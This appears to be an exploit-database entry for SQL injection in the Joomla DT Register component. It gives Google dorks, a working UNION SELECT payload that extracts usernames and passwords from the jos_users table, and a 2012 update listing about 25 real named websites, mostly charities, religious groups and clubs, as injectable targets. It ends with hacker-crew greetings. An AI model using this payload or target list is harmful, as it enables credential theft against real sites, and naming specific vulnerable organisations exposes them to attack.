Joomla Component com_dtregister SQL injection Vulnerability

2008-07-16T00:00:00
ID 1337DAY-ID-3418
Type zdt
Reporter His0k4
Modified 2008-07-16T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===============================================================
Joomla Component DT Register Remote SQL injection Vulnerability
===============================================================



/---------------------------------------------------------------\
\                                				/
/       Joomla Component DT Register Remote SQL injection       \
\                                				/
\---------------------------------------------------------------/


[*] Author    :  His0k4 [ALGERIAN HaCkeR]

[*] Dork      :  inurl:com_DTRegister eventId

[*] POC        : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL}

[*] Example    : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(username,0x3a,password) FROM jos_users&task=pay_options&Itemid=138

[*] Greetings  : All friends & muslims HaCkeRs


---------->>>  UPDATE   <<<-------------

[ Joomla Component com_dtregister (category&list1) SQLInjection Vulnerability ]

[x] Author : the_cyber_nuxbie
[x] Home   : www.thecybernuxbie.com
[x] E-mail : [email protected]
[x] Found  : 22 February 2012 @ 07:15 PM.
[x] Tested : Windows 7 Ultimate Bajakan.
[x] Dork   : inurl:"/index.php?option=com_dtregister"
________________________________________________________________
****************************************************************

- Exploit Report:
http://localhost/index.php?option=com_dtregister&task=category&list1=[SQL Injection]

- Special Web Vuln SQL Injection (Using SSL):
https://motherscenter.org/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
https://godcaresministry.com/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
https://secure.ngpa.org/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
https://sinaitemple.org/eventsreg/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
https://threefirescouncil.org/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
https://exponentialregistration.com/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
https://autismsociety-nc.org/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
https://acnsc.org/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
https://riverfrontchallenge.com/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
https://events.nashuavalleybsa.org/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
https://artsbma.org/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
https://whcems.org/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
https://pitch2pitch.com/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
https://mowogo.org/joomla/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
https://tapaonline.org/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
https://sinaitemple.org/eventsreg/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]

http://hebrewnationradio.com/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
http://jlcny.org/site/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
http://apc11.co.nz/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
http://ride2recovery.com/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
http://columbuscurling.com/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
http://events.bigriverrunning.com/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
http://cypresssaloonlive.net/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
http://mindgame-productions.com/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
http://sssc.uk.com/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]
http://armygeographer.org/index.php?option=com_dtregister&task=category&list1=1' + [SQL Injection]

And Many More @ Google... :-D

0day no more...
$$$ Quote Of The Day $$$
"n0 d0rk f0r k1dd10ts"

Happy Birthday For Me...!!!
I Love You AfniLadyzCyber...
Thanks To Om "Xcmbc Fazz", udah nemanin chatting ye-em sampai tengah malam...

Saya Hanya Lulusan SMA Sederajat, Yang Sering Di Hina Orang.
"Saya Ingin Kuliah, Tapi Saya Tidak Punya Biaya"

- Greetz:
*** 1337day Inject0r TEAM ***
...:::' All Member & Staff Inject0r TEAM ':::...

- Greetz To All Exploiters From Indonesian:
[ Member Of Inj3ct0r & Exploit-DB ]
Akatsuchi, AntiSecurity, Arianom, bius, blackraptor, bumble_be, c4uR, cr4wl3r, cyberlog, Don Tukulesto, EA Ngel,
eidelweiss, Flyff666, g3mbeLz_YCL, Gendenk, gunslinger_, h4ntu, IbnuSina, irvian, Jack, k3m4n9i, k1ngk0n9, k1tk4t,
k4mtiez, K-159, kecemplungkalen, Mask_magicianz, MISTERFRIBO, M3NW5, Mbah_Semar, mywisdom, Newbie Campuz, NoGe, 
NTOS-Team, Oli Bekas, OoN_Boy, Pokeng, r3m1ck, S3T4N, s4va, sikunYuk, SENOT, skulmatic, spykit, Sudden_death, 
team_elite, tempe_mendoan, the_day, tomplixsee, v3n0m, vir0e5, Vrs-hCk, vYc0d, Xr0b0t, y3d1ps, etc... 

"Kalian Telah Mengharumkan Nama INDONESIA Di Dunia IT-Underground"

Me @ February, 22 2012, GMT +07:15 Solo Raya, Indonesian.






#  0day.today [2018-04-13]  #